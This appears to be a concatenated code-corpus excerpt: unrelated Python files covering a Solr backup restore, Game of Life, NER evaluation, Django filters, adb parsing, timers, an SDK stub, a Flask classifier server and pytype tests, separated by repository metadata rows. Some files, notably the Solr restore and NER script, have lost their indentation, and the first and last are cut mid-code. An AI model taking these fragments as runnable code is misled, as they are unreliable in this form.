core_pairs = command_commons.create_core_pairs(original_core_host_pairs,
new_core_host_pairs)
Logger.info("Generated core pairs: " + str(core_pairs))
Logger.info(
format("Remove write.lock files from folder '{index_location}'"))
for write_lock_file in command_commons.get_files_by_pattern(
format("{index_location}"), 'write.lock'):
File(write_lock_file, action="delete")
Logger.info(
format(
"Restore Solr Collection {collection} from {index_location} ..."))
if command_commons.collection in [
"ranger_audits", "history", "hadoop_logs", "audit_logs",
"vertex_index", "edge_index", "fulltext_index"
    ]:  # Make sure Ambari won't delete an important collection
raise Exception(
format(
"Selected collection for restore is: {collection}. It is not recommended to restore on default collections."
))
hdfs_cores_on_host = []
for core_pair in core_pairs:
src_core = core_pair['src_core']
target_core = core_pair['target_core']
if src_core in command_commons.skip_cores:
Logger.info(format("Core '{src_core}' (src) is filtered out."))
continue
elif target_core in command_commons.skip_cores:
Logger.info(
format("Core '{target_core}' (target) is filtered out."))
continue
core_data = command_commons.solr_restore_core_data
only_if_cmd = format("test -d {index_location}/snapshot.{src_core}")
core_root_dir = format("{solr_datadir}/backup_{target_core}")
core_root_without_backup_dir = format("{solr_datadir}/{target_core}")
if command_commons.solr_hdfs_path:
Directory([core_root_dir],
mode=0755,
cd_access='a',
create_parents=True,
owner=params.infra_solr_user,
group=params.user_group,
only_if=only_if_cmd)
else:
Directory([
format("{core_root_dir}/data/index"),
format("{core_root_dir}/data/tlog"),
format("{core_root_dir}/data/snapshot_metadata")
],
mode=0755,
cd_access='a',
create_parents=True,
owner=params.infra_solr_user,
group=params.user_group,
only_if=only_if_cmd)
core_details = core_data[target_core]['properties']
core_properties = {}
core_properties['numShards'] = core_details['numShards']
core_properties[
'collection.configName'] = command_commons.solr_restore_config_set
core_properties['name'] = target_core
core_properties['replicaType'] = core_details['replicaType']
core_properties['collection'] = command_commons.collection
if command_commons.solr_hdfs_path:
core_properties[
'coreNodeName'] = 'backup_' + core_details['coreNodeName']
else:
core_properties['coreNodeName'] = core_details['coreNodeName']
core_properties['shard'] = core_details['shard']
if command_commons.solr_hdfs_path:
hdfs_solr_node_folder = command_commons.solr_hdfs_path + format(
"/backup_{collection}/") + core_details['coreNodeName']
source_folder = format("{index_location}/snapshot.{src_core}/")
if command_commons.check_folder_exists(source_folder):
hdfs_cores_on_host.append(target_core)
command_commons.HdfsResource(
format("{hdfs_solr_node_folder}/data/index/"),
type="directory",
action="create_on_execute",
source=source_folder,
owner=params.infra_solr_user,
mode=0755,
recursive_chown=True,
recursive_chmod=True)
command_commons.HdfsResource(
format("{hdfs_solr_node_folder}/data/tlog"),
type="directory",
action="create_on_execute",
owner=params.infra_solr_user,
mode=0755)
command_commons.HdfsResource(
format("{hdfs_solr_node_folder}/data/snapshot_metadata"),
type="directory",
action="create_on_execute",
owner=params.infra_solr_user,
mode=0755)
else:
copy_cmd = format(
"cp -r {index_location}/snapshot.{src_core}/* {core_root_dir}/data/index/") if command_commons.solr_keep_backup \
else format("mv {index_location}/snapshot.{src_core}/* {core_root_dir}/data/index/")
Execute(
copy_cmd,
only_if=only_if_cmd,
user=params.infra_solr_user,
logoutput=True)
PropertiesFile(
core_root_dir + '/core.properties',
properties=core_properties,
owner=params.infra_solr_user,
group=params.user_group,
mode=0644,
only_if=only_if_cmd)
Execute(
format("rm -rf {solr_datadir}/{collection}*"),
user=params.infra_solr_user,
logoutput=True)
for core_pair in core_pairs:
src_core = core_pair['src_core']
src_host = core_pair['src_host']
target_core = core_pair['target_core']
if src_core in command_commons.skip_cores:
Logger.info(format("Core '{src_core}' (src) is filtered out."))
continue
elif target_core in command_commons.skip_cores:
Logger.info(
format("Core '{target_core}' (target) is filtered out."))
continue
if os.path.exists(format("{index_location}/snapshot.{src_core}")):
data_to_save = {}
host_core_data = command_commons.solr_restore_core_data
core_details = host_core_data[target_core]['properties']
core_node = core_details['coreNodeName']
data_to_save['core'] = target_core
data_to_save['core_node'] = core_node
data_to_save['old_host'] = core_pair['target_host']
data_to_save['new_host'] = src_host
if command_commons.solr_hdfs_path:
data_to_save['new_core_node'] = "backup_" + core_node
else:
data_to_save['new_core_node'] = core_node
command_commons.write_core_file(target_core, data_to_save)
jaas_file = params.infra_solr_jaas_file if params.security_enabled else None
core_json_location = format("{index_location}/{target_core}.json")
znode_json_location = format(
"/restore_metadata/{collection}/{target_core}.json")
solr_cloud_util.copy_solr_znode_from_local(
params.zookeeper_quorum, params.infra_solr_znode,
params.java64_home, jaas_file, core_json_location,
znode_json_location)
core_root_dir = format("{solr_datadir}/backup_{target_core}")
core_root_without_backup_dir = format("{solr_datadir}/{target_core}")
if command_commons.solr_hdfs_path:
if target_core in hdfs_cores_on_host:
Logger.info(
format(
"Core data '{target_core}' is located on this host, processing..."
))
host_core_data = command_commons.solr_restore_core_data
core_details = host_core_data[target_core]['properties']
core_node = core_details['coreNodeName']
collection_core_dir = command_commons.solr_hdfs_path + format(
"/{collection}/{core_node}")
backup_collection_core_dir = command_commons.solr_hdfs_path + format(
"/backup_{collection}/{core_node}")
command_commons.HdfsResource(
collection_core_dir,
type="directory",
action="delete_on_execute",
owner=params.infra_solr_user)
if command_commons.check_hdfs_folder_exists(
backup_collection_core_dir):
collection_backup_core_dir = command_commons.solr_hdfs_path + format(
"/{collection}/backup_{core_node}")
command_commons.move_hdfs_folder(
backup_collection_core_dir, collection_backup_core_dir)
else:
Logger.info(
format(
"Core data '{target_core}' is not located on this host, skipping..."
))
Execute(
format("mv {core_root_dir} {core_root_without_backup_dir}"),
user=params.infra_solr_user,
logoutput=True,
only_if=format("test -d {core_root_dir}"))
Directory([format("{core_root_without_backup_dir}")],
mode=0755,
cd_access='a',
create_parents=True,
owner=params.infra_solr_user,
group=params.user_group,
recursive_ownership=True,
only_if=format("test -d {core_root_without_backup_dir}"))
if command_commons.solr_hdfs_path and not command_commons.solr_keep_backup:
only_if_cmd = format(
"test -d {index_location}/snapshot.{src_core}")
Directory(
format("{index_location}/snapshot.{src_core}"),
action="delete",
only_if=only_if_cmd,
owner=params.infra_solr_user)
| 43.111429 | 162 | 0.619325 |
4a4e29b33d782e1cd998ef1451869c55ac9fcbce
| 4,539 |
py
|
Python
|
Game_of_Life/board.py
|
Moomoo-pls/NLP_Game_of_Life
|
afe6bb6ccd4a83b6ffeccc8ac257872251bd39bb
|
[
"MIT"
] | null | null | null |
Game_of_Life/board.py
|
Moomoo-pls/NLP_Game_of_Life
|
afe6bb6ccd4a83b6ffeccc8ac257872251bd39bb
|
[
"MIT"
] | null | null | null |
Game_of_Life/board.py
|
Moomoo-pls/NLP_Game_of_Life
|
afe6bb6ccd4a83b6ffeccc8ac257872251bd39bb
|
[
"MIT"
] | null | null | null |
from Game_of_Life.cell import Cell
from random import randint
class Board:
def __init__(self, rows, columns):
# The rows and columns will be initialized by the size of the console
self.rows = rows
self.columns = columns
self.allDead = False
# initialize a cell object in every row
self.grid = [[Cell() for column_cells in range(self.columns)] for row_cells in range(self.rows)]
self.generate_board()
def isAllDead(self):
'''
Check to see if all the cells died
Only returns true if they all died.
'''
for row in self.grid:
for column in row:
if column.is_alive() == True:
return False
return True
def generate_board(self):
'''
Goes through each row and randomly sets a cell alive
'''
for row in self.grid:
for column in row:
#there is a 20% chance the cells spawn alive.
chance_number = randint(0,4)
if chance_number == 1:
column.set_alive()
def draw_board(self):
'''
Draw the current state of the board in the terminal
'''
for row in self.grid:
for column in row:
print (column.print_status_character(),end='')
            print () # to create a new line per row.
def update_board(self):
'''
Updates the state of the board based on
the check of each cell. The cells react according
to the state they were in on the board, not dynamically.
        Ex. If a cell flips, its neighbours still process it in
        its unflipped state.
'''
#cells list for living cells to kill and cells to resurrect or keep alive
goes_alive = []
gets_killed = []
for row in range(len(self.grid)):
for column in range(len(self.grid[row])):
# Check neighbour square:
check_neighbour = self.find_neighbour(row , column)
living_neighbours_count = []
for neighbour_cell in check_neighbour:
# Check live status for neighbour_cell:
if neighbour_cell.is_alive():
living_neighbours_count.append(neighbour_cell)
cell_object = self.grid[row][column]
status_main_cell = cell_object.is_alive()
#If the cell is alive, check the neighbour status.
if status_main_cell == True:
if len(living_neighbours_count) < 2 or len(living_neighbours_count) > 3:
gets_killed.append(cell_object)
if len(living_neighbours_count) == 3 or len(living_neighbours_count) == 2:
goes_alive.append(cell_object)
else:
if len(living_neighbours_count) == 3:
goes_alive.append(cell_object)
# Set cell statuses
for cell_items in goes_alive:
cell_items.set_alive()
for cell_items in gets_killed:
cell_items.set_dead()
def find_neighbour(self,check_row,check_column):
'''
method that checks all the neighbours for all the cells
and returns the list of the valid neighbours so the update
method can set the new status
'''
# To only search neighbouring cells, we search through -1 to 1.
search_min = -1
search_max = 2
neighbour_list = []
        # Neighbors are only invalid if they are outside the board's bounds
# This logic basically filters them out.
for row in range(search_min,search_max):
for column in range(search_min,search_max):
neighbour_row = check_row + row
neighbour_column = check_column + column
valid_neighbour = True
if (neighbour_row) == check_row and (neighbour_column) == check_column:
valid_neighbour = False
if (neighbour_row) < 0 or (neighbour_row) >= self.rows:
valid_neighbour = False
if (neighbour_column) < 0 or (neighbour_column) >= self.columns:
valid_neighbour = False
if valid_neighbour:
neighbour_list.append(self.grid[neighbour_row][neighbour_column])
return neighbour_list
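# Minimal usage sketch: run a few generations in the terminal. Assumes the
# companion Cell class provides is_alive/set_alive/set_dead/
# print_status_character exactly as used above.
if __name__ == "__main__":
    demo_board = Board(10, 20)
    for _ in range(5):
        demo_board.draw_board()
        demo_board.update_board()
        if demo_board.isAllDead():
            break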
| 35.186047 | 104 | 0.564662 |
a2e1a18fb0392ac84e691b3ab2220a441ecf5347
| 4,195 |
py
|
Python
|
feature_pu_model_evl.py
|
CharrierFlorent/BioNER-PU-learning
|
9a2003d5eeffa1997550199a9dc541cbd074f7e3
|
[
"Apache-2.0"
] | 139 |
2019-05-27T02:14:39.000Z
|
2022-03-28T09:26:17.000Z
|
feature_pu_model_evl.py
|
marvinstanley/LexiconNER
|
8814d2e4badc5ec25dff35ea4a3e98372256ac7c
|
[
"Apache-2.0"
] | 12 |
2019-06-18T08:13:10.000Z
|
2022-02-09T12:33:17.000Z
|
feature_pu_model_evl.py
|
marvinstanley/LexiconNER
|
8814d2e4badc5ec25dff35ea4a3e98372256ac7c
|
[
"Apache-2.0"
] | 29 |
2019-05-26T08:47:15.000Z
|
2020-10-11T09:11:46.000Z
|
# -*- coding: utf-8 -*-
# @Time : 2018/8/7 16:48
# @Author : Xiaoyu Xing
# @File : feature_pu_model_evl.py
from utils.feature_pu_model_utils import FeaturedDetectionModelUtils
from utils.data_utils import DataPrepare
import torch
import argparse
from feature_pu_model import PULSTMCNN, Trainer
from sub_model import CharCNN, CaseNet, WordNet, FeatureNet
import numpy as np
torch.manual_seed(1013)
parser = argparse.ArgumentParser(description="PU NER EVL")
parser.add_argument('--model', default="", help='saved model name')
parser.add_argument('--output', default=0, help='write the test result, set 1 for writing result to file')
parser.add_argument('--set', type=int, default=0, help='test set or valid set')
parser.add_argument('--flag', default="PER", help='entity type (PER/LOC/ORG/MISC)')
parser.add_argument('--lr_rate', type=int, default=1e-4, help='learning rate')
parser.add_argument('--dataset', default="conll2003", help='name of the dataset')
parser.add_argument('--type', default="bnpu", help='pu learning type (bnpu/bpu/upu)')
args = parser.parse_args()
dp = DataPrepare(args.dataset)
mutils = FeaturedDetectionModelUtils(dp)
trainSet, validSet, testSet, prior = mutils.load_dataset(args.flag, args.dataset, 1.0)
setIter = [testSet, validSet]
detectionSet = setIter[args.set]
fileNameIter = ["data/" + args.dataset + "/test.txt", "data/" + args.dataset + "/valid.txt"]
fileName = fileNameIter[args.set]
charcnn = CharCNN(dp.char2Idx)
wordnet = WordNet(dp.wordEmbeddings, dp.word2Idx)
casenet = CaseNet(dp.caseEmbeddings, dp.case2Idx)
featurenet = FeatureNet()
pulstmcnn = PULSTMCNN(dp, charcnn, wordnet, casenet, featurenet, 150, 200, 1, 0.5)
if torch.cuda.is_available():
charcnn.cuda()
wordnet.cuda()
casenet.cuda()
featurenet.cuda()
pulstmcnn.cuda()
pred_test = []
corr_test = []
prob_test = []
trainer = Trainer(pulstmcnn, prior, 0, 1, 1e-4, 4)
pulstmcnn.load_state_dict(torch.load(args.model))
for step, (x_word_test_batch, x_case_test_batch, x_char_test_batch, x_feature_batch, y_test_batch) in enumerate(
mutils.iterateSet(detectionSet, batchSize=100, mode="TEST", shuffle=False)):
testBatch = [x_word_test_batch, x_case_test_batch, x_char_test_batch, x_feature_batch]
correcLabels = []
for x in y_test_batch:
for xi in x:
correcLabels.append(xi)
lengths = [len(x) for x in x_word_test_batch]
predLabels, probLabels = trainer.test(testBatch, lengths)
correcLabels = np.array(correcLabels)
assert len(predLabels) == len(correcLabels) == len(probLabels)
start = 0
for i, l in enumerate(lengths):
end = start + l
p = predLabels[start:end]
c = correcLabels[start:end]
r = probLabels[start:end]
pred_test.append(p)
corr_test.append(c)
prob_test.append(r)
start = end
assert len(pred_test) == len(corr_test) == len(prob_test)
test_sentences = dp.read_origin_file(fileName)
test_words = []
test_efs = []
for s in test_sentences:
temp = []
temp2 = []
for word, ef, lf in s:
temp.append(word)
temp2.append(ef)
test_words.append(temp)
test_efs.append(temp2)
newSentencesTest = []
for i, s in enumerate(test_words):
sent = []
for j, item in enumerate(s):
sent.append([item, test_efs[i][j], pred_test[i][j], prob_test[i][j]])
newSentencesTest.append(sent)
newSentencesTest_, newLabelsTest, newPredsTest, newProbTest = dp.wordLevelGeneration2(newSentencesTest)
p, r, f1 = dp.compute_precision_recall_f1(newLabelsTest, newPredsTest, args.flag, 1)
print("Precision: {}, Recall: {}, F1: {}".format(p, r, f1))
if args.output:
outputFile = "result/" + args.type + "_feature_pu_" + args.dataset + "_" + args.flag + "_" + str(args.set) + ".txt"
with open(outputFile, "w") as fw:
for i, sent in enumerate(test_words):
preds = pred_test[i]
probs = prob_test[i]
corrs = test_efs[i]
for j, w in enumerate(sent):
pred = preds[j]
corr = corrs[j]
prob = probs[j]
fw.write(("{} {} {} {}\n").format(w, corr, pred, prob))
fw.write("\n")
| 35.854701 | 119 | 0.67652 |
9af66f013c14bd0ec1c49b79206bc8f4b50daff4
| 761 |
py
|
Python
|
geo/filters.py
|
cmc333333/mapusaurus
|
1d7ccef90d0ed832d52f797cbe68057057cd0177
|
[
"CC0-1.0"
] | null | null | null |
geo/filters.py
|
cmc333333/mapusaurus
|
1d7ccef90d0ed832d52f797cbe68057057cd0177
|
[
"CC0-1.0"
] | 55 |
2018-02-09T04:11:31.000Z
|
2018-07-04T18:30:29.000Z
|
geo/filters.py
|
cmc333333/mapusaurus
|
1d7ccef90d0ed832d52f797cbe68057057cd0177
|
[
"CC0-1.0"
] | null | null | null |
import django_filters
from django.contrib.postgres.search import TrigramSimilarity
from geo.models import CoreBasedStatisticalArea, County
def filter_to_search_term(queryset, name, value):
return queryset\
.annotate(similarity=TrigramSimilarity("name", value))\
.filter(similarity__gte=0.01)\
.order_by("-similarity")
class CBSAFilters(django_filters.FilterSet):
q = django_filters.CharFilter(method=filter_to_search_term)
class Meta:
model = CoreBasedStatisticalArea
fields = {"geoid": ["in"]}
class CountyFilters(django_filters.FilterSet):
q = django_filters.CharFilter(method=filter_to_search_term)
class Meta:
model = County
fields = {"geoid": ["in"], "state": ["exact"]}
| 27.178571 | 63 | 0.712221 |
47852fc2662970b3f8f435ab1355ebabfecea169
| 3,776 |
py
|
Python
|
interpret_adb.py
|
CodeBishop/beholder
|
ca25d961c534c0a8ccc1ce2c9cec11b791ed2976
|
[
"MIT"
] | null | null | null |
interpret_adb.py
|
CodeBishop/beholder
|
ca25d961c534c0a8ccc1ce2c9cec11b791ed2976
|
[
"MIT"
] | null | null | null |
interpret_adb.py
|
CodeBishop/beholder
|
ca25d961c534c0a8ccc1ce2c9cec11b791ed2976
|
[
"MIT"
] | null | null | null |
import re
def interpretProcessInfo(commandOutput, appId):
'''Takes in the output of a `ps -wel` and a process name, returns a string describing that process or None if the process was not found'''
processDict = interpretProcessInfoIntoDict(commandOutput, appId)
    if processDict is not None:
return processDict['cmd'] + " (pid " + processDict['pid'] + ") " + processDict['runTime'] + " Nice: " + processDict['nice']
return None
def interpretProcessInfoIntoDict(commandOutput, appId):
'''Takes in the output of a `ps -wel` and a process name, returns a dictionary of info about that process or None if the process was not found'''
processDict = {}
for line in commandOutput.split('\n'):
if line.find(appId) != -1:
values = [s for s in line.split()]
processDict['pid'] = values[3]
processDict['nice'] = values[7]
processDict['runTime'] = values[12]
processDict['cmd'] = values[13]
return processDict
return None
def interpretActivityInfo(commandOutput, appId):
'''Takes in the output of a `dumpsys activity <appId>` and an application ID, returns a string describing that app's Activity'''
activityDict = {}
for line in commandOutput.split('\n'):
if 'ACTIVITY' in line:
activityDict['activityName'] = line.split()[1]
activityDict['pidInfo'] = line.split()[3]
if 'mResumed' in line:
flagEntries = line.split()
activityDict['resumedFlag'] = 'true' in flagEntries[0]
activityDict['stoppedFlag'] = 'true' in flagEntries[1]
activityDict['finishedFlag'] = 'true' in flagEntries[2]
if 'mLastFrameTime' in line:
activityDict['timeSinceLastRender'] = re.search(r"\b.*(\b\d+) ms ago\)", line).group(1)
if activityDict != {}:
activityString = ""
activityString += activityDict['activityName'] + " (" + activityDict['pidInfo'] + ")"
if 'timeSinceLastRender' in activityDict.keys() and activityDict['timeSinceLastRender'] != None:
activityString += " updated " + activityDict['timeSinceLastRender'] + " ms ago"
activityString += " state: "
if 'resumedFlag' in activityDict.keys() and activityDict['resumedFlag']:
activityString += "foreground "
if 'stoppedFlag' in activityDict.keys() and activityDict['stoppedFlag']:
activityString += "stopped "
if 'finishedFlag' in activityDict.keys() and activityDict['finishedFlag']:
activityString += "finished "
return activityString
return ""
'''Replaces this command:
hero deaths % watch -n 0.3 'adb shell dumpsys activity <appId> | grep -E "mResumed|astFrameT|hasService|ebView|CTIVITY"'
'''
return "hello"
def interpretRunningServiceList(commandOutput, appId):
'''Takes in the output of a `dumpsys activity services <appId>` and an application ID, returns a list of strings naming all the Android services that app is running'''
output = commandOutput.split('\n')
# Strip out newlines
for i in range(len(output)):
output[i] = output[i].strip()
# Filter out everything but the active ServiceRecords for the specified app
filteredOutput = []
for line in output:
if '* ServiceRecord' in line and appId in line:
filteredOutput.append(line)
# Strip the ServiceRecord lines down to just the last part of the Service identifier
serviceNames = []
for line in filteredOutput:
# Take last part of Service identifier and truncate final char (should be a close brace)
# TODO: Rewrite this as a regex
serviceNames.append(line.split('.')[-1][:-1])
return serviceNames
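# Minimal sketch of the expected input: the parsers above assume the standard
# `ps -wel` long-format columns (F S UID PID PPID C PRI NI ADDR SZ WCHAN TTY
# TIME CMD). The sample line below is fabricated for illustration only.
if __name__ == "__main__":
    sample_ps = ("F S   UID   PID  PPID  C PRI  NI ADDR     SZ WCHAN  TTY     TIME CMD\n"
                 "4 S 10111 12345  2045  0  80   0 -    123456 ep_pol ?   00:01:23 com.example.app")
    print(interpretProcessInfo(sample_ps, "com.example.app"))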
| 48.410256 | 171 | 0.645392 |
29a86c66d2b0477164fa489b3c7f8439735a6ec8
| 589 |
py
|
Python
|
sdk/datamigration/azure-mgmt-datamigration/azure/mgmt/datamigration/aio/__init__.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 2,728 |
2015-01-09T10:19:32.000Z
|
2022-03-31T14:50:33.000Z
|
sdk/datamigration/azure-mgmt-datamigration/azure/mgmt/datamigration/aio/__init__.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 17,773 |
2015-01-05T15:57:17.000Z
|
2022-03-31T23:50:25.000Z
|
sdk/datamigration/azure-mgmt-datamigration/azure/mgmt/datamigration/aio/__init__.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 1,916 |
2015-01-19T05:05:41.000Z
|
2022-03-31T19:36:44.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from ._data_migration_management_client import DataMigrationManagementClient
__all__ = ['DataMigrationManagementClient']
| 53.545455 | 94 | 0.601019 |
6d754deb817aa614eed207dfb0aea08702501257
| 946 |
py
|
Python
|
kubernetes/test/test_v1_endpoint_port.py
|
redjohn/python
|
5e512ff564c244c50cab780d821542ed56aa965a
|
[
"Apache-2.0"
] | 1 |
2019-04-14T23:51:35.000Z
|
2019-04-14T23:51:35.000Z
|
kubernetes/test/test_v1_endpoint_port.py
|
redjohn/python
|
5e512ff564c244c50cab780d821542ed56aa965a
|
[
"Apache-2.0"
] | null | null | null |
kubernetes/test/test_v1_endpoint_port.py
|
redjohn/python
|
5e512ff564c244c50cab780d821542ed56aa965a
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.14.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import kubernetes.client
from kubernetes.client.rest import ApiException
from kubernetes.client.models.v1_endpoint_port import V1EndpointPort
class TestV1EndpointPort(unittest.TestCase):
""" V1EndpointPort unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testV1EndpointPort(self):
"""
Test V1EndpointPort
"""
# FIXME: construct object with mandatory attributes with example values
#model = kubernetes.client.models.v1_endpoint_port.V1EndpointPort()
pass
if __name__ == '__main__':
unittest.main()
| 21.022222 | 105 | 0.704017 |
6276e19e31d59a19d2db936e5b7464317ec3e301
| 1,531 |
py
|
Python
|
Chapter09/server_ckpt.py
|
PacktPublishing/Deep-Learning-with-PyTorch-Lightning
|
4eb607200281323383413eaad4fcb7a3feaa7502
|
[
"MIT"
] | 22 |
2021-08-31T21:59:02.000Z
|
2022-03-29T21:26:31.000Z
|
Chapter09/server_ckpt.py
|
PacktPublishing/-Getting-Started-with-PyTorch-Lightning
|
4eb607200281323383413eaad4fcb7a3feaa7502
|
[
"MIT"
] | 6 |
2021-11-20T10:11:30.000Z
|
2022-03-30T06:45:05.000Z
|
Chapter09/server_ckpt.py
|
PacktPublishing/-Getting-Started-with-PyTorch-Lightning
|
4eb607200281323383413eaad4fcb7a3feaa7502
|
[
"MIT"
] | 17 |
2021-04-10T16:26:08.000Z
|
2022-03-17T07:45:52.000Z
|
# Important Note:
#
# For your convenience, we have copied the notebook named "Cats and Dogs Classifier.ipynb" from Chapter 2 to the
# GitHub folder for this chapter. Only change in the notebook is that the ImageClassifier class is now defined in its own
# file named "image_classifier.py"; so we have removed that cell and added an import statement instead.
#
# Run the "Cats and Dogs Classifier.ipynb" notebook in this folder before launching this server program.
import torch.nn.functional as functional
import torchvision.transforms as transforms
from PIL import Image
from flask import Flask, request, jsonify
from image_classifier import ImageClassifier
model = ImageClassifier.load_from_checkpoint("./lightning_logs/version_0/checkpoints/epoch=99-step=3199.ckpt")
IMAGE_SIZE = 64
def transform_image(img):
transform = transforms.Compose([
transforms.Resize(IMAGE_SIZE),
transforms.CenterCrop(IMAGE_SIZE),
transforms.ToTensor()
])
return transform(img).unsqueeze(0)
def get_prediction(img):
result = model(img)
return functional.softmax(result, dim=1)[:, 1].tolist()[0]
app = Flask(__name__)
@app.route("/predict", methods=["POST"])
def predict():
img_file = request.files['image']
img = Image.open(img_file.stream)
img = transform_image(img)
prediction = get_prediction(img)
if prediction >= 0.5:
cat_or_dog = "dog"
else:
cat_or_dog = "cat"
return jsonify({'cat_or_dog': cat_or_dog})
if __name__ == '__main__':
app.run()
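# Example request against the running server (illustrative; Flask's development
# server listens on http://127.0.0.1:5000 by default):
#   curl -X POST -F "image=@cat.jpg" http://127.0.0.1:5000/predict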
| 31.244898 | 121 | 0.727629 |
53bbe4dbfa3148c14c08561e4190ff438ecfc006
| 2,129 |
py
|
Python
|
nfv/nfv-common/nfv_common/timers/_timer.py
|
SidneyAn/nfv
|
5f0262a5b6ea4be59f977b9c587c483cbe0e373d
|
[
"Apache-2.0"
] | null | null | null |
nfv/nfv-common/nfv_common/timers/_timer.py
|
SidneyAn/nfv
|
5f0262a5b6ea4be59f977b9c587c483cbe0e373d
|
[
"Apache-2.0"
] | null | null | null |
nfv/nfv-common/nfv_common/timers/_timer.py
|
SidneyAn/nfv
|
5f0262a5b6ea4be59f977b9c587c483cbe0e373d
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright (c) 2015-2016 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
from nfv_common import debug
from nfv_common.timers._timestamp import get_monotonic_timestamp_in_ms
DLOG = debug.debug_get_logger('nfv_common.timers.timer')
class Timer(object):
"""
Timer
"""
_id = 1
def __init__(self, timer_name, initial_delay_secs, interval_secs,
callback, *callback_args, **callback_kwargs):
"""
Create timer
"""
self._timer_id = Timer._id
self._timer_name = timer_name
self._interval_secs = interval_secs
self._arm_timestamp = get_monotonic_timestamp_in_ms()
self._callback = callback(*callback_args, **callback_kwargs)
if initial_delay_secs is None:
self._next_expiry_in_secs = interval_secs
else:
self._next_expiry_in_secs = initial_delay_secs
Timer._id += 1
@property
def timer_id(self):
"""
Returns the unique timer identifier
"""
return self._timer_id
@property
def timer_name(self):
"""
Returns the name of the timer
"""
return self._timer_name
def reschedule(self, interval_secs):
"""
Reschedule a timer
"""
self._interval_secs = interval_secs
self._next_expiry_in_secs = self._interval_secs
def callback(self, now_ms):
"""
Execute the callback associated with this timer if enough
time has elapsed
"""
rearm = True
secs_expired = (now_ms - self._arm_timestamp) / 1000
if secs_expired > self._next_expiry_in_secs:
DLOG.verbose("Timer %s with timer id %s fired." % (self._timer_name,
self._timer_id))
try:
self._callback.send(self._timer_id)
self._arm_timestamp = get_monotonic_timestamp_in_ms()
self._next_expiry_in_secs = self._interval_secs
except StopIteration:
rearm = False
return rearm
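# Note on the callback protocol (inferred from the code above, not from the
# wider codebase): the callback argument is invoked once with
# *callback_args/**callback_kwargs to build a coroutine/generator, each expiry
# is delivered to it via send(timer_id), and a StopIteration raised by the
# coroutine stops the timer from being re-armed.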
| 28.77027 | 80 | 0.600282 |
f05f0a5651b3001a47bbcc7a5be9e6e0e6882b1c
| 20,240 |
py
|
Python
|
pytype/tests/test_inference.py
|
yang/pytype-hack
|
093d69c9a6f6144f0209cdeb8eed6c7e832bbee0
|
[
"Apache-2.0"
] | null | null | null |
pytype/tests/test_inference.py
|
yang/pytype-hack
|
093d69c9a6f6144f0209cdeb8eed6c7e832bbee0
|
[
"Apache-2.0"
] | null | null | null |
pytype/tests/test_inference.py
|
yang/pytype-hack
|
093d69c9a6f6144f0209cdeb8eed6c7e832bbee0
|
[
"Apache-2.0"
] | null | null | null |
"""Common methods for tests of infer.py."""
import logging
import re
import sys
import textwrap
from pytype import convert_structural
from pytype import errors
from pytype import infer
from pytype.pyc import loadmarshal
from pytype.pytd import optimize
from pytype.pytd import pytd
from pytype.pytd import utils as pytd_utils
from pytype.pytd.parse import parser
from pytype.pytd.parse import visitors
import unittest
log = logging.getLogger(__name__)
# Make this false if you need to run the debugger inside a test.
CAPTURE_STDOUT = ("-s" not in sys.argv)
class Infer(object):
"""Calls infer, produces useful output on failure.
Typically called indirectly from InferenceTest.Infer, which has
the same args.
This implements the 'with' protocol. Typical use is (where 'self'
is the test instance, e.g. test_inference.InferenceTest (below)):
with self.Infer(src) as ty:
self.assertOnlyHasReturnType(ty.Lookup("f"), self.bool)
This code catches exceptions that happen inside Infer(src), so no need to test
for ty being non-None (although if it is None, the failed method call will be
caught and reported nicely).
Comments on the flags:
The type inferencer has three layers:
1. Run concrete bytecode
2. Run abstract bytecode
3. Convert ("solve") unknowns
It's useful to be able to test all three things in isolation.
Solving unknowns in a test where you don't expect unknowns will give you
more complex debug output and make tests slower. It might also be confusing,
since the output you're checking is the one from the type converter, causing
you to suspect the latter as the cause of bugs even though it's not actually
doing anything.
As for "deep": this causes all public functions to be called with
__any_object__ args, so for precise control, you can set deep=False
and explicitly make the calls.
"""
# TODO(pludemann): This is possibly a slightly less magical paradigm:
# with self.Inferencer(deep=False, solve_unknowns=False) as ty:
# ty = i.Infer("""....""")
# self.assertOnlyHasReturnType(ty.Lookup(...), ...)
def __init__(self, test, srccode, deep=False,
solve_unknowns=False, extract_locals=False,
extra_verbose=False, report_errors=True, **kwargs):
"""Constructor for Infer.
Args:
test: the Testcase (see inferenceTest.Infer)
srccode: the Python source code to do type inferencing on
      deep: see class comments (assume --api - analyze all methods, even those
that don't have a caller)
solve_unknowns: try to solve for all ~unknown types
extract_locals: strip ~unknown types from the output pytd
      extra_verbose: extra intermediate output (for debugging)
      report_errors: Whether to fail if the type inferencer reports any errors.
**kwargs: Additional options to pass through to infer_types().
"""
# TODO(pludemann): There are eight possible combinations of these three
# boolean flags. Do all of these combinations make sense? Or would it be
# possible to simplify this into something like a "mode" parameter:
# mode="solve" => deep=True, solve_unknowns=True
# mode="structural" => deep=True, solve_unknowns=False, extract_locals=False
# mode="deep" => deep=True, solve_unknowns=False, extract_locals=True
# mode="main" => deep=False, solve_unknowns=False, extract_locals=True
self.srccode = textwrap.dedent(srccode)
self.inferred = None
self.optimized_types = None
self.extract_locals = None # gets set if extract_locals is set (below)
self.extra_verbose = extra_verbose
self.canonical_types = None
# We need to catch any exceptions here and preserve them for __exit__.
# Exceptions raised in the body of 'with' will be presented to __exit__.
try:
self.types = test._InferAndVerify(
self.srccode, deep=deep, cache_unknowns=True,
solve_unknowns=solve_unknowns,
report_errors=report_errors, **kwargs)
self.inferred = self.types
if extract_locals:
# Rename "~unknown" to "?"
